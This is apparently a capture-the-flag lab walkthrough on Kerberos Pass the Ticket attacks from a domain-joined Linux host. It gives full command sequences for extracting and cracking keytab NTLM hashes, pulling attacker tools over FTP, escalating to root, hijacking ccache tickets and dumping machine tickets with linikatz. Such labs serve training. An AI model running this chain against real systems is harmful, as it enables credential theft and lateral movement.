> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-ticket-from-linux-ptt/questions.md).

# Questions

## Pass the Ticket (PtT) from Linux — Lab Walkthrough

### Overview

On **Windows**, tickets are usually stored as `.kirbi` files.\
On **Linux**, tickets are usually stored as **ccache** files.

Linux attacks rely on native Kerberos tools and exposed keytabs.

| Tool or variable   | Purpose                                               |
| ------------------ | ----------------------------------------------------- |
| `klist`            | View the current Kerberos ticket cache                |
| `kinit`            | Request or import a Kerberos ticket                   |
| `KRB5CCNAME`       | Point the session at a specific ccache file           |
| `keytabextract.py` | Parse keytab files and extract NTLM hashes            |
| `linikatz.sh`      | Dump tickets and keytabs from Linux credential stores |
| `realm list`       | Show AD enrollment details on Linux                   |

***

### Full attack chain

```
SSH as David
    ↓
realm list
    ↓
Find carlos.keytab
    ↓
Extract NTLM hash → crack → su carlos
    ↓
crontab -l → find svc_workstations.kt
    ↓
Find svc_workstations._all.kt
    ↓
Extract NTLM hash → crack → SSH as svc_workstations
    ↓
sudo -l → sudo su → root
    ↓
Use Julio's ccache via KRB5CCNAME → smbclient → julio.txt
    ↓
Run linikatz → load LINUX01$ ticket → smbclient → linux01 flag
```

***

### Step 1 — Initial access as David

```bash
# Connect to the domain-joined Linux machine
ssh david@inlanefreight.htb@10.129.158.254 -p 2222

# Read the flag
cat ~/flag.txt
```

> **Why `user@domain@host`?**\
> The `user@domain` part tells the target to treat you as a domain user, not a local user.

***

### Step 2 — Enumerate domain enrollment

```bash
realm list
```

Focus on:

* The joined AD domain
* Permitted logon groups
* Users or groups worth targeting

> `realm` comes from the `realmd` package and shows how the Linux host is joined to AD.

***

### Step 3 — Find readable keytab files

```bash
# Search for keytab files
find / -name '*keytab*' -ls 2>/dev/null
```

Example permission output:

```
-rw-------  root  root  /etc/krb5.keytab
-rw-rw-rw-  root  root  /opt/specialfiles/carlos.keytab
```

`/etc/krb5.keytab` is root-only.\
`carlos.keytab` is world-readable and usable.

> A world-readable keytab is a strong escalation path.\
> It stores Kerberos principals and encrypted keys.

***

### Step 4 — Extract, crack, and switch to Carlos

#### 4a. Set up `keytabextract.py` on the attacker machine

```bash
git clone https://github.com/sosdave/KeyTabExtract
cd KeyTabExtract
sudo python3 -m pyftpdlib --port 21
```

#### 4b. Pull the tool onto the target

```bash
curl -o keytabextract.py ftp://10.10.16.5/keytabextract.py
```

#### 4c. Extract the NTLM hash

```bash
python3 keytabextract.py /opt/specialfiles/carlos.keytab
```

Expected output:

```
REALM      : INLANEFREIGHT.HTB
PRINCIPAL  : carlos
NTLM HASH  : a738f92b3c08b424ec2d99589a9cce60
AES-256    : <hash>
```

#### 4d. Crack the hash

```bash
# -m 1000 = NTLM
# -a 0    = straight wordlist attack
hashcat -a 0 -m 1000 a738f92b3c08b424ec2d99589a9cce60 /usr/share/wordlists/rockyou.txt
```

Result:

```
Password5
```

#### 4e. Switch to Carlos and read the flag

```bash
su carlos@inlanefreight.htb
# Password: Password5

cd
cat flag.txt
```

***

### Step 5 — Pivot to `svc_workstations`

#### 5a. Check Carlos's crontab

```bash
crontab -l
```

Output:

```
*/5 * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
```

#### 5b. Read the script

```bash
cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
```

Output:

```bash
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass
```

This reveals a readable service keytab.

#### 5c. Pull `keytabextract.py` into Carlos's session

```bash
curl -o keytabextract.py ftp://10.10.16.5/keytabextract.py
```

#### 5d. Try the first keytab

```bash
python3 keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
```

Result:

> No NTLM hash appears. Only AES-256 is present.

#### 5e. Search for more `.kt` files

```bash
find / -name '*.kt*' -ls 2>/dev/null
```

This finds:

```
/home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
```

This version includes all encryption types, including RC4.\
That gives a crackable NTLM hash.

#### 5f. Extract from `_all.kt`

```bash
python3 keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
```

Output:

```
REALM      : INLANEFREIGHT.HTB
PRINCIPAL  : svc_workstations
NTLM HASH  : 7247e8d4387e76996ff3f18a34316fdd
AES-256    : <hash>
```

#### 5g. Crack the hash

```bash
hashcat -a 0 -m 1000 7247e8d4387e76996ff3f18a34316fdd /usr/share/wordlists/rockyou.txt
```

#### 5h. SSH as `svc_workstations`

```bash
ssh svc_workstations@inlanefreight.htb@10.129.158.254 -p 2222
# Password: <cracked password>

cat ~/flag.txt
```

***

### Step 6 — Escalate to root

```bash
sudo -l
```

Output:

```
(ALL : ALL) NOPASSWD: ALL
```

This account has full passwordless sudo.

```bash
sudo su
cat /root/flag.txt
```

***

### Step 7 — Abuse Julio's ccache

#### 7a. List ccache files

```bash
ls -lah /tmp
```

Look for files named `krb5cc_*`.

#### 7b. Load the first ccache and verify it

```bash
cd /tmp
export KRB5CCNAME=krb5cc_647401106_HRJDux
klist
```

`KRB5CCNAME` tells Kerberos tools which cache file to use.

Result:

> This ticket is expired.

#### 7c. Try the expired ticket

```bash
smbclient //DC01/julio -k -c ls -no-pass
```

Result:

> The KDC rejects the expired ticket.

#### 7d. Try the second ccache

```bash
export KRB5CCNAME=krb5cc_647401106_y07zSl
klist
```

Result:

> This ticket is still valid.

#### 7e. Read Julio's flag

```bash
smbclient //DC01/julio -N
ls
get julio.txt
exit

cat julio.txt
```

***

### Step 8 — Abuse the machine account ticket

#### Concept

Domain-joined Linux machines keep their own Kerberos tickets in the SSSD cache.

If you reach that cache as root, you can authenticate as the machine account.\
That can expose shares or services assigned to the host itself.

#### 8a. Get `linikatz` on the attacker machine

```bash
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
python3 -m pyftpdlib -p 21
```

#### 8b. Pull it onto the target as root

```bash
curl -o linikatz.sh ftp://10.10.16.28/linikatz.sh
```

> Root is required because `/var/lib/sss/db/` is protected.

#### 8c. Run `linikatz`

```bash
chmod 777 linikatz.sh
./linikatz.sh
```

This dumps the machine account ccache from SSSD's credential store.

#### 8d. Load the machine ticket

```bash
export KRB5CCNAME=/var/lib/sss/db/ccache_INLANEFREIGHT.HTB
klist
```

Expected principal:

```
LINUX01$@INLANEFREIGHT.HTB
```

#### 8e. Access the share and read the flag

```bash
smbclient //DC01/linux01 -N
ls
get flag.txt
exit

cat flag.txt
```

***

### Key concepts summary

| Concept           | Detail                                               |
| ----------------- | ---------------------------------------------------- |
| **Keytab file**   | Stores a Kerberos principal and encrypted keys       |
| **ccache file**   | Stores active Kerberos tickets on disk               |
| **KRB5CCNAME**    | Switches the active ticket cache                     |
| **`kinit -k -t`** | Imports a keytab without a plaintext password        |
| **`_all.kt`**     | Often includes RC4 and exposes a crackable NTLM hash |
| **AES-256 only**  | Not practical to crack with the same NTLM workflow   |
| **SSSD ccache**   | Stores machine tickets under `/var/lib/sss/db/`      |
| **linikatz**      | Dumps Linux tickets and keytabs, usually as root     |

***

### Quick reference — all commands

```bash
# Initial access
ssh david@inlanefreight.htb@10.129.158.254 -p 2222
cat ~/flag.txt
realm list

# Find keytabs
find / -name '*keytab*' -ls 2>/dev/null
find / -name '*.kt*' -ls 2>/dev/null

# Attacker setup for KeyTabExtract
git clone https://github.com/sosdave/KeyTabExtract
cd KeyTabExtract
sudo python3 -m pyftpdlib --port 21

# Pull tool onto target
curl -o keytabextract.py ftp://10.10.16.5/keytabextract.py

# Extract hashes
python3 keytabextract.py /opt/specialfiles/carlos.keytab
python3 keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
python3 keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt

# Crack NTLM
hashcat -a 0 -m 1000 a738f92b3c08b424ec2d99589a9cce60 /usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 1000 7247e8d4387e76996ff3f18a34316fdd /usr/share/wordlists/rockyou.txt

# Switch users
su carlos@inlanefreight.htb
ssh svc_workstations@inlanefreight.htb@10.129.158.254 -p 2222

# Privilege escalation
sudo -l
sudo su
cat /root/flag.txt

# Julio ccache abuse
ls -lah /tmp
export KRB5CCNAME=krb5cc_647401106_HRJDux
klist
export KRB5CCNAME=krb5cc_647401106_y07zSl
klist
smbclient //DC01/julio -k -c ls -no-pass
smbclient //DC01/julio -N
get julio.txt

# Machine account ticket
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
python3 -m pyftpdlib -p 21
curl -o linikatz.sh ftp://10.10.16.28/linikatz.sh
chmod 777 linikatz.sh
./linikatz.sh
export KRB5CCNAME=/var/lib/sss/db/ccache_INLANEFREIGHT.HTB
klist
smbclient //DC01/linux01 -N
get flag.txt
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-ticket-from-linux-ptt/questions.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
